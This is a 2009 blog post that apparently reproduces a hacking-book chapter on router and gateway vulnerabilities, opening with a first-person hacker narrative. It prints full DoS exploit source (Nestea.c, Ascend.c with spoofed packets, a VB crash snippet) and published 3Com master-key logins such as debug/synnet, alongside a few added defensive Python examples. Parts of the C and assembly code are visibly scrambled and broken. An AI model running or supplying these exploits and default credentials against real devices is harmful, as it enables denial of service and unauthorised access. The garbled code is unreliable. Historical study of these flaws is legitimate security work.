Sunday, December 6, 2009

Vulnerability Hacking Secrets

ACT III

A Hacker's Vocation



As I stood there pondering my new found potential source of goodies, I realized I was a bit confused: The letter stated that there were a few prerequisites before I would be considered a tyro member. First and foremost, I had to draft a few paragraphs as an autobiography, including my expectations of, and prospective personal offerings to, the group. Second, I had to include a list of software, hardware, and technologies in which I considered myself skilled. The third requirement mandated a complete listing of all software and hardware in my current possession. Last, I was required to make copies of this information and mail them to the names on a list that was included on an enclosed diskette. I was especially excited to see that list. I wondered: Was it a member list? How many computer enthusiasts, like myself, could there be? I immediately popped the disk in my system and executed the file, runme.com. Upon execution, the program produced an acceptance statement, which I skimmed, and quickly clicked on Agreed. Next I was instructed to configure my printer for mailing labels. This I was happy to do since I had just purchased a batch of labels and couldn't wait to print some out. To my surprise, however, my printer kept printing and printing until I had to literally run to the store and buy some more, and then again—five packets of 50 in all. Then I had to buy 265 stamps. I couldn't believe the group had more than 260 members: How long ago had this group been established? I was eager to find out, so I mailed my requirements the very next morning. The day after, as I walked back from the post office, I thought I should make a copy of my membership disk; it did have important contacts within. But when I arrived home and loaded the diskette, the runme.com file seemed to have been deleted. (Later I discovered a few hidden files that solved that mystery.) The list was gone, so I waited.



Patience is a virtue—at least that's what I was brought up to believe. And, in this case it paid off. It wasn't long before I received my first reply as a new member of this computer club. The new package included another mailing list—different from the first one and much smaller. There was also a welcome letter and a huge list of software programs. The latter half of the welcome note included some final obligatory instructions. My first directive was to choose a handle, a nickname by which I would be referred in all correspondence with the club. I chose Ponyboy, my nickname in a neighborhood group I had belonged to some years back. The next objective was twofold: First I had to send five of the programs from my submission listing to an enclosed address. In return, as the second part of the objective, I was to choose five programs I wanted from the list enclosed with the welcome letter. I didn't have a problem sending my software (complete original disks, manuals, and packaging) as I was looking forward to receiving new replacements.



Approximately a week and a half passed before I received a response. I was surprised that it was much smaller than the one I had mailed—there was no way my selections could fit in a parcel that small. My initial suspicion was that I had been swindled, but when I opened the package, I immediately noticed three single-sided diskettes with labels and cryptic handwriting on both sides. It took a moment for me to decipher the scribble to recognize the names of computer programs that I had requested, plus what appeared to be extra software, on the second side of the third diskette. Those bonus programs read simply: hack-005. This diskette aroused my curiosity as never before. I cannot recall powering on my system and scanning a diskette so quickly before or since.



The software contained Underground disk copy programs, batches of hacking text files, and file editors from ASCII to HEX. One file included instructions on pirating commercial software, another on how to convert single-sided diskettes into using both sides (that explained the labels on both sides of what would normally have been single-sided floppies). And there was more: files on hacking system passwords and bypassing CMOS and BIOS instructions. There was a very long list of phone numbers and access codes to hacker bulletin boards in almost every state. There was also information on secret meetings that were to take place in my area. I felt like a kid given free rein in a candy store. In retrospect, I believe that was the moment when I embarked on a new vocation: as a hacker.



Gateways and Routers and Internet Server Daemons



The port, socket, and service vulnerability penetrations detailed in Chapter 8 can more or less be applied to any section in this part of the book, as they were chosen because they are among the most common threats to a specific target. Using examples throughout the three chapters that comprise this part, we'll also examine specifically selected exploits, those you may already be aware of and many you probably won't have seen until now. Together, they provide important information that will help to solidify your technology foundation. And all the source code, consisting of MS Visual Basic, C, and Perl snippets, can be modified for individual assessments.



In this chapter, we cover gateways and routers and Internet server daemons. In Chapter 10, we cover operating systems, and in Chapter 11, proxies and firewalls.



Without written consent from the target company, most of these procedures are illegal in the United States and many other countries. Neither the author nor the publisher will be held accountable for the use or misuse of the information contained in this book.



Gateways and Routers



Fundamentally, a gateway is a network point that acts as a doorway between multiple networks. In a company network, for example, a proxy server may act as a gateway between the internal network and the Internet. By the same token, an SMTP gateway would allow users on the network to exchange e-messages. Gateways interconnect networks and are categorized according to their OSI model layer of operation; for example, repeaters at Physical Layer 1, bridges at Data Link Layer 2, routers at Network Layer 3, and so on. This section describes vulnerability hacking secrets for common gateways that function primarily as access routers, operating at Network Layer 4.



A router that connects any number of LANs or WANs uses information from protocol headers to build a routing table, and forwards packets based on compiled decisions. Routing hardware design is relatively straightforward, consisting of network interfaces, administration or console ports, and even auxiliary ports for out-of-band management devices such as modems. As packets travel into a router's network interface card, they are placed into a queue for processing. During this operation, the router builds, updates, and maintains routing tables while concurrently checking packet headers for next-step compilations—whether accepting and forwarding the packet based on routing policies or discarding the packet based on filtering policies. Again, at the same time, protocol performance functions provide handshaking, windowing, buffering, source quenching, and error checking.
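To make the forward-or-discard decision described above concrete, here is an added Python example (not code from the book) of a minimal router: a routing table answered by longest-prefix match, and a packet filter evaluated first-match in the permit/deny syntax that the 3Com "sho filter allowedhosts" listing later in this chapter uses. The routes, the addresses (documentation ranges) and the filter rules are constructed for the example; real router filter grammars differ in detail.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class Route:
    prefix: ipaddress.IPv4Network
    next_hop: str
    interface: str

@dataclass(frozen=True)
class FilterRule:
    action: str                 # "permit" or "deny"
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    proto: str                  # "tcp", "udp", or "ip" (any protocol)
    dport: Optional[int]        # None means any destination port

# Constructed routing table: a default route plus two overlapping prefixes,
# so the longest-prefix rule actually has something to decide.
ROUTES = [
    Route(ipaddress.IPv4Network("0.0.0.0/0"), "203.0.113.1", "wan0"),
    Route(ipaddress.IPv4Network("198.51.100.0/24"), "10.0.0.2", "eth1"),
    Route(ipaddress.IPv4Network("198.51.100.128/25"), "10.0.0.3", "eth2"),
]

# Constructed filter in the same shape as the chapter's "sho filter" output.
FILTER = """\
permit 192.0.2.0/24 198.51.100.165/32 tcp dst eq 23
permit 192.0.2.0/24 198.51.100.109/32 tcp dst eq 513
deny 0.0.0.0/0 0.0.0.0/0 ip
"""

def parse_filter(text: str) -> list:
    """Parse 'permit|deny SRC/LEN DST/LEN PROTO [dst eq PORT]' lines, in order."""
    rules = []
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        action, src, dst, proto = parts[:4]
        dport = int(parts[6]) if parts[4:6] == ["dst", "eq"] else None
        rules.append(FilterRule(action,
                                ipaddress.IPv4Network(src, strict=False),
                                ipaddress.IPv4Network(dst, strict=False),
                                proto, dport))
    return rules

def filter_decision(rules, src: str, dst: str, proto: str, dport=None) -> str:
    """First matching rule wins; no match is an implicit deny."""
    s, d = ipaddress.IPv4Address(src), ipaddress.IPv4Address(dst)
    for r in rules:
        if s in r.src and d in r.dst and r.proto in ("ip", proto) and r.dport in (None, dport):
            return r.action
    return "deny"

def lookup_route(routes, dst: str):
    """Longest-prefix match: the most specific prefix containing dst wins."""
    d = ipaddress.IPv4Address(dst)
    candidates = [r for r in routes if d in r.prefix]
    return max(candidates, key=lambda r: r.prefix.prefixlen, default=None)

def forward(routes, rules, src: str, dst: str, proto: str, dport=None):
    """Filtering policy is applied before routing policy, as the text describes."""
    if filter_decision(rules, src, dst, proto, dport) != "permit":
        return ("discard", None)
    route = lookup_route(routes, dst)
    if route is None:
        return ("discard", None)          # no route: drop, do not guess
    return ("forward", route.next_hop)

if __name__ == "__main__":
    rules = parse_filter(FILTER)
    for pkt in [("192.0.2.12", "198.51.100.165", "tcp", 23),
                ("192.0.2.12", "198.51.100.165", "tcp", 22),
                ("192.0.2.12", "198.51.100.109", "tcp", 513)]:
        print(pkt, "->", forward(ROUTES, rules, *pkt))
```

The order matters: the same destination can be forwarded via 10.0.0.3 (the /25) for telnet and discarded for any other port, because the trailing `deny 0.0.0.0/0 0.0.0.0/0 ip` is reached only when no permit matched.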



The gateways described here also involve various terminal server, transport, and application gateway services. These Underground vulnerability secrets cover approximately 90 percent of the gateways in use today, including those of 3Com, Ascend, Cabletron, Cisco, Intel, and Nortel/Bay.



3Com



3Com (www.3com.com) has been offering technology products for over two decades. With more than 300 million users worldwide, it's no wonder 3Com is among the 100 largest companies on the Nasdaq. Relevant to this section, the company offers access products that range from small-office connectivity with the OfficeConnect family of products, to high-performance LAN/WAN availability, including VPN tunneling and security applications. Each solution is designed to build medium-enterprise secure remote access, intranets, and extranets. These products integrate WAN technologies such as Frame Relay, xDSL, ISDN, leased lines, and multiprotocol LAN-to-LAN connections. The OfficeConnect product line targets small to medium-sized businesses, typically providing remote-location connectivity as well as Internet access. On the other end of the spectrum, the SuperStack II and Total Control product series provide medium to large enterprises and ISPs with secure, reliable connections to branch offices, the Internet, and access points for mobile users.



Liabilities

HiPer ARC Card Denial-of-Service Attack

Synopsis: 3Com HiPer ARC vulnerable to nestea and 1234 denial-of-service (DoS) attacks.

Hack State: System crash.

Vulnerabilities: HiPer ARC's running system version 4.1.11/x.

Breach: 3Com HiPer ARC cards running system version 4.1.11 are vulnerable to certain DoS attacks that cause the cards to simply crash and reboot. Hackers note: 3Com/USR's IP stacks are historically not very resistant to specific kinds of DoS attacks, such as Nestea.c variations (originally by humble of rhino9), shown here:



Nestea.c

#include #include #include #include #include #include #include #include #include #include #include























/* bsd usage works now, the original nestea.c was broken, because some
   braindead linsux-c0d3r was too stupid to use sendto() correctly */

#ifndef STRANGE_LINSUX_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define MAGIC2  108
#define PADDING 256     /* datagram frame padding for first packet */
#define COUNT   500     /* we are overwriting a small number of bytes we
                           shouldnt have access to in the kernel. to be safe,
                           we should hit them till they die : */





void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    u_long src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;





    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }





    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i) {
            case 's':   /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':   /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':   /* number to send */
                count = atoi(optarg);
                break;
            default :
                usage(argv[0]);
                break;  /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count) count = COUNT;



    fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n");
    fprintf(stderr, "Death on flaxen wings (yet again):\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");
    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "bOOm ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
}

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
    int i;
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family = AF_INET;
    sin.sin_port = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    packet = (u_char *)malloc(IPH + UDPH + PADDING+40);
    p_ptr = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
    byte = 0x45;                            /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                             /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);       /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);      /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;             /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                             /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;            /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;            /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);   /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);   /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + 10);    /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
               sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }



    p_ptr = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                            /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                             /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);       /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = FIX(6);           /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;             /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                             /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;            /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;            /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);   /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);   /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin,
               sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    p_ptr = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);
    byte = 0x4F;                            /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                             /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);       /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0 | FIX(IP_MF);   /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;             /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                             /* IP checksum filled in by kernel */

= dst_ip; /* IP

= htons(src_prt); = htons(dst_prt);

= htons(8 + PADDING);

*((u_long *)p_ptr) p_ptr += 4; *((u_long *)p_ptr)

/

p_ptr += 44; *((u_short *)p_ptr) p_ptr += 2; *((u_short *)p_ptr)

rt */

p_ptr += 2; *((u_short *)p_ptr)

/



for(i=0;i
{

p_ptr[i++]=random()%255;

}



    if (sendto(sock, packet, IPH + UDPH + PADDING+40, 0, (struct sockaddr *)&sin,
               sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}



u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}



void usage(u_char *name)

{

fprintf(stderr,

"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",

name);

exit(0);

}



HiPer ARC Card Login

Synopsis: The HiPer ARC card establishes a potential weakness with the default adm account.



Hack State: Unauthorized access.



Vulnerabilities: HiPer ARC card v4.1.x revisions.



Breach: The software that 3Com has developed for the HiPer ARC card (v4.1.x revisions) poses potential security threats. After uploading the software, there will be a login account called adm, with no password. Naturally, security policies dictate to delete the default adm login from the configuration. However, once the unit has been configured, it is necessary to save settings and reset the box. At this point, the adm login (requiring no password), remains active and cannot be deleted.



Filtering



Synopsis: Filtering with dial-in connectivity is not effective. Basically, a user can dial in, receive a "host" prompt, then type in any hostname without actual authentication procedures. Consequently, the system logs report that the connection was denied.



Hack State: Unauthorized access.



Vulnerabilities: Systems with the Total Control NETServer Card V.34/ISDN with Frame Relay V3.7.24. AIX 3.2.



Breach: Total Control Chassis is common in many terminal servers, so when someone dials in to an ISP, he or she may be dialing in to one of these servers. The breach pertains to systems that respond with a "host:" or similar prompt. When a port is set to "set host prompt," the access filters are commonly ignored:

sho filter allowedhosts



permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.161/32 tcp dst eq 539

permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.165/32 tcp dst eq 23

permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.106/32 tcp dst eq 23

permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.168/32 tcp dst eq 540

permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.168/32 tcp dst eq 23

permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.109/32 tcp dst eq 3030

permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.109/32 tcp dst eq 3031

permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.109/32 tcp dst eq 513

deny 0.0.0.0/0 0.0.0.0/0 ip



An attacker can type a hostname twice at the "host:" prompt, and be presented with a telnet session to the target host. At this point, the hacker gains unauthorized access, such as:

sho ses

S19 hacker.target.system. Login In ESTABLISHED 4:30

Even though access is attained, the syslogs will typically report the following:

XXXXXX remote_access: Packet filter does not exist. User hacker... access denied.

Master Key Passwords

Synopsis: Certain 3Com switches open a doorway to hackers due to a number of "master key" passwords that have been distributed on the Internet.

Hack State: Unauthorized access to configurations.



Vulnerabilities: The CoreBuilder 2500, 3500, 6000, and 7000, or SuperStack II switch 2200, 2700, 3500, and 9300 are all affected.



Breach: According to 3Com, the master key passwords were "accidentally found" by an Internet user and then published by hackers of the Underground. Evidently, 3Com engineers keep the passwords for use during emergencies, such as password loss.

CoreBuilder 6000/2500 username: debug password: synnet

CoreBuilder 7000 username: tech password: tech

SuperStack II Switch 2200 username: debug password: synnet

SuperStack II Switch 2700 username: tech password: tech





The CoreBuilder 3500 and SuperStack II Switch 3900 and 9300 also have these mechanisms, but the special login password is changed to match the admin-level password when the password is modified.
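The Filtering entry above leaves a defender with one detection hook: the terminal server's own "Packet filter does not exist ... access denied" syslog message says the port's filter was never loaded, while "sho ses" shows the same user's session ESTABLISHED. The following added Python example (not from the book or from 3Com) parses constructed copies of both outputs and flags the contradiction. The syslog lines and the session table are constructed to match the samples above; treating the first label of the session's host name as the login name is an assumption made for the example, not documented terminal-server behaviour.

```python
import re

# Constructed "sho ses" output, shaped like the sample in the Filtering entry.
SESSION_TABLE = """\
S19 hacker.target.system. Login In ESTABLISHED 4:30
S21 alice.example.net. Login In ESTABLISHED 0:12
"""

# Constructed syslog lines; the first copies the message quoted in the text,
# the second is a made-up "granted" line so the filter has something to skip.
SYSLOG = """\
Jan  5 14:02:11 ts1 remote_access: Packet filter does not exist. User hacker... access denied.
Jan  5 14:03:02 ts1 remote_access: User alice... access granted.
"""

SESSION_RE = re.compile(r"^(S\d+)\s+(\S+)\s+Login In\s+(\w+)\s+(\d+:\d+)")
DENIED_RE = re.compile(
    r"remote_access: (Packet filter does not exist\.)?\s*User (\w+)\.{3} access denied")

def parse_sessions(text: str) -> dict:
    """Map session id -> host/state/duration from a 'sho ses' dump."""
    sessions = {}
    for line in text.splitlines():
        m = SESSION_RE.match(line)
        if m:
            sid, host, state, duration = m.groups()
            sessions[sid] = {"host": host.rstrip("."), "state": state, "duration": duration}
    return sessions

def parse_denials(text: str) -> list:
    """Collect 'access denied' events and whether they cite a missing filter."""
    denials = []
    for line in text.splitlines():
        m = DENIED_RE.search(line)
        if m:
            denials.append({"user": m.group(2),
                            "missing_filter": m.group(1) is not None,
                            "line": line})
    return denials

def audit(session_text: str, syslog_text: str) -> list:
    """Return (finding, user, session_id) tuples worth an operator's attention.

    missing-filter: the server logged that no packet filter exists for the
    port; on the affected firmware this is the condition under which the
    access filters are ignored, so it is a configuration fault by itself.
    denied-but-established: a user the log says was denied nevertheless has
    an ESTABLISHED session (host's first label == user name, an assumption).
    """
    findings = []
    sessions = parse_sessions(session_text)
    for d in parse_denials(syslog_text):
        if d["missing_filter"]:
            findings.append(("missing-filter", d["user"], None))
        for sid, s in sessions.items():
            if s["state"] == "ESTABLISHED" and s["host"].split(".")[0] == d["user"]:
                findings.append(("denied-but-established", d["user"], sid))
    return findings

if __name__ == "__main__":
    for f in audit(SESSION_TABLE, SYSLOG):
        print(f)
```

The useful signal is the second finding: a "denied" in the log paired with a live session is exactly the mismatch the text describes, and it is cheap to alert on even when the filter configuration itself cannot be fixed immediately.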

NetServer 8/16 DoS Attack

Synopsis: NetServer 8/16 vulnerable to nestea DoS attack.

Hack State: System crash.

Vulnerabilities: The NetServer 8/16 V.34, O/S version 2.0.14.

Breach: The NetServer 8/16 is also vulnerable to the Nestea.c (shown previously) DoS attack.

PalmPilot Pro DoS Attack

Synopsis: PalmPilot vulnerable to nestea DoS attack.

Hack State: System crash.

Vulnerabilities: The PalmPilot Pro, O/S version 2.0.x.

Breach: 3Com's PalmPilot Pro running system version 2.0.x is vulnerable to a nestea.c DoS attack, causing the system to crash and require reboot.



The source code in this chapter can be found on the CD bundled with this book.

Ascend/Lucent



The Ascend (www.ascend.com) remote-access products offer open WAN-to-LAN access and security features all packed in single units. These products are considered ideal for organizations that need to maintain a tightly protected LAN for internal data transactions, while permitting outside free access to Web servers, FTP sites, and such. These products commonly target small to medium business gateways and enterprise branch-to-corporate access entry points. Since the merger of Lucent Technologies (www.lucent.com) with Ascend Communications, the data networking product line is much broader and more powerful and reliable.



Liabilities



Distorted UDP Attack



Synopsis: There is a flaw in the Ascend router internetworking operating system that allows the machines to be crashed by certain distorted UDP packets.

Figure 9.1 Successful penetration with the TigerBreach Penetrator.

Hack State: System crash.

Vulnerabilities: Ascend Pipeline and MAX products.

Breach: While Ascend configurations can be modified via a graphical interface, this configurator locates Ascend routers on a network using a special UDP packet. Basically, Ascend routers listen for broadcasts (a unique UDP packet to the "discard" port 9) and respond with another UDP packet that contains the name of the router. By sending a specially distorted UDP packet to the discard port of an Ascend router, an attacker can cause the router to crash. With TigerBreach Penetrator, during a security analysis, you can verify connectivity to test for this flaw (see Figure 9.1).



An example of a program that can be modified for UDP packet transmission is shown here (Figure 9.2 shows the corresponding forms).



Crash.bas



Option Explicit

Private Sub Crash()
    Socket1.RemoteHost = txtIP.Text
    Socket1.SendData txtName.Text + "Crash!!!"
End Sub

Synopsis: Challenging remote telnet sessions can congest the Ascend router session limit and cause the system to refuse further attempts.



Hack State: Severe congestion.



Vulnerabilities: Ascend Pipeline products.



Breach: Continuous remote telnet authentication attempts can max out system session limits, causing the router to refuse legitimate sessions.



MAX Attack



Synopsis: Attackers have been able to remotely reboot Ascend MAX units by telnetting to Port 150 while sending nonzero-length TCP Offset packets with TCPoffset.c, shown later.

Hack State: System restart.

Vulnerabilities: Ascend MAX 5x products.

TCP Offset Harassment

Synopsis: A hacker can crash an Ascend terminal server by sending a packet with nonzero-length TCP offsets.

Hack State: System crash.

Vulnerabilities: Ascend terminal servers.

Breach: Ascend.c (originally by The Posse).



Ascend.c



#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

unsigned short compute_tcp_checksum(struct tcphdr *th, int len, unsigned long saddr, unsigned long daddr)

{

unsigned long sum; __asm__("

addl %%ecx, %%ebx

adcl %%edx, %%ebx

adcl $0, %%ebx



: "=b"(sum)

: "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_

TCP*256)

: "bx", "cx", "dx" );

__asm__("

movl %%ecx, %%edx

cld

cmpl $32, %%ecx jb 2f

%%ebx %%ebx %%ebx %%ebx

shrl $5, %%ecx clc

1: lodsl

adcl %%eax, lodsl

adcl %%eax, lodsl

adcl %%eax, lodsl

adcl %%eax,

lodsl

adcl %%eax, lodsl

adcl %%eax, lodsl

adcl %%eax, lodsl

adcl %%eax,

loop

adcl

movl

andl

je 4f

shrl

clc

lodsl

adcl

loop

adcl

movl

testw

je 5f

lodsw

addl

adcl

movw

test

je 6f

lodsb

addl

adcl

movl

shrl

addw

adcw

1b

$0, %%ebx %%edx, %%e< $28, %%ecx

%%eax,

3b

$0, %% $0, %%

$2, %



$2, %%ecx





%%ebx



ebx eax

%dx





%%eax, %%ebx $0, %%ebx $0, %%ax $1, %%edx





%%eax, %%ebx $0, %%ebx %%ebx, %%eax $16, %%eax

%%ax, %%bx

$0, %%bx

: "=b"(sum)

: "0"(sum), "c"(len), "S"(th)

: "ax", "bx", "cx", "dx", "si

return((~sum) & 0xffff);

}

#define psize ( sizeof(struct iphdr) + sizeof(struct tcphdr) )
#define tcp_offset ( sizeof(struct iphdr) )
#define err(x) { fprintf(stderr, x); exit(1); }
#define errors(x, y) { fprintf(stderr, x, y); exit(1); }
struct iphdr temp_ip;
int temp_socket = 0;

u_short
ip_checksum (u_short * buf, int nwords)
{
    unsigned long sum;
    for (sum = 0; nwords > 0; nwords--)
        sum += *buf++;
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return ~sum;
}

void
fixhost (struct sockaddr_in *addr, char *hostname)
{
    struct sockaddr_in *address;
    struct hostent *host;

    address = (struct sockaddr_in *) addr;
    (void) bzero ((char *) address, sizeof (struct sockaddr_in));
    address->sin_family = AF_INET;
    address->sin_addr.s_addr = inet_addr (hostname);
    if ((int) address->sin_addr.s_addr == -1) {
        host = gethostbyname (hostname);
        if (host)
        {
            bcopy (host->h_addr, (char *) &address->sin_addr, host->h_length);
        }
        else {
            puts ("Couldn't resolve address!!!");
            exit (-1);
        }
    }
}

unsigned int lookup (host)
    char *host;
{
    unsigned int addr;
    struct hostent *he;

    addr = inet_addr (host);
    if (addr == -1) {
        he = gethostbyname (host);
        if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
            return 0;

        bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
    }
    return (addr);
}

unsigned short lookup_port (p)
    char *p;
{
    int i;
    struct servent *s;
    if ((i = atoi (p)) == 0) {
        if ((s = getservbyname (p, "tcp")) == NULL)
            errors ("Unknown port %s\n", p);
        i = ntohs (s->s_port);
    }
    return ((unsigned short) i);
}



void
spoof_packet (struct sockaddr_in local, int fromport,
              struct sockaddr_in remote, int toport, ulong sequence,
              int sock, u_char theflag, ulong acknum,
              char *packdata, int datalen)
{
    char *packet;
    int tempint;
    if (datalen > 0) datalen++;

Подпись: (char *) toport; fromport; = tempint;

malloc (psize + datalen);

packet = tempint toport = fromport

{

tcp_offset);

(packet + = htons (fromport); = htons (toport); = theflag; random (); random ();

however we randomize everything

struct tcphdr *fake_tcp; fake_tcp = (struct tcphdr * fake_tcp->th_dport fake_tcp->th_sport fake_tcp->th_flags fake_tcp ->th_seq = fake_tcp->th_ack = /* this is what really matters, else

to prevent simple rule based filters */ fake_tcp->th_off = random (); fake_tcp->th_win = random (); fake_tcp->th_urp = random ();



}

    if (datalen > 0) {
        char *tempbuf;
        tempbuf = (char *) (packet + tcp_offset + sizeof (struct tcphdr));
        for (tempint = 0; tempint < datalen - 1; tempint++) {
            *tempbuf = *packdata;
            *tempbuf++;
            *packdata++;
        }
        *tempbuf = '\r';
    }



    {
        struct iphdr *real_ip;
        real_ip = (struct iphdr *) packet;
        real_ip->version = 4;
        real_ip->ihl = 5;
        real_ip->tot_len = htons (psize + datalen);
        real_ip->tos = 0;
        real_ip->ttl = 64;
        real_ip->protocol = 6;
        real_ip->check = 0;
        real_ip->id = 10786;
        real_ip->frag_off = 0;
        bcopy ((char *) &local.sin_addr, &real_ip->daddr, sizeof (real_ip->daddr));
        bcopy ((char *) &remote.sin_addr, &real_ip->saddr, sizeof (real_ip->saddr));
        temp_ip.saddr = htonl (ntohl (real_ip->daddr));
        real_ip->daddr = htonl (ntohl (real_ip->saddr));
        real_ip->saddr = temp_ip.saddr;
        real_ip->check = ip_checksum ((u_short *) packet, sizeof (struct iphdr) >> 1);
        {
            struct tcphdr *another_tcp;
            another_tcp = (struct tcphdr *) (packet + tcp_offset);
            another_tcp->th_sum = 0;
            another_tcp->th_sum = compute_tcp_checksum (another_tcp,
                                                        sizeof (struct tcphdr) + datalen,
                                                        real_ip->saddr, real_ip->daddr);
        }
    }
    {
        int result;
        sock = (int) temp_socket;
        result = sendto (sock, packet, psize + datalen, 0,
                         (struct sockaddr *) &remote, sizeof (remote));
    }
    free (packet);
}

void
main (argc, argv)
    int argc;
    char **argv;
{
    unsigned int daddr;
    unsigned short dport;
    struct sockaddr_in sin;
    int s, i;
    if (argc != 3)
        errors ("Usage: %s \n\nDest port of 23 for Ascend units.\n", argv[0]);
    if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
        err ("Unable to open raw socket.\n");
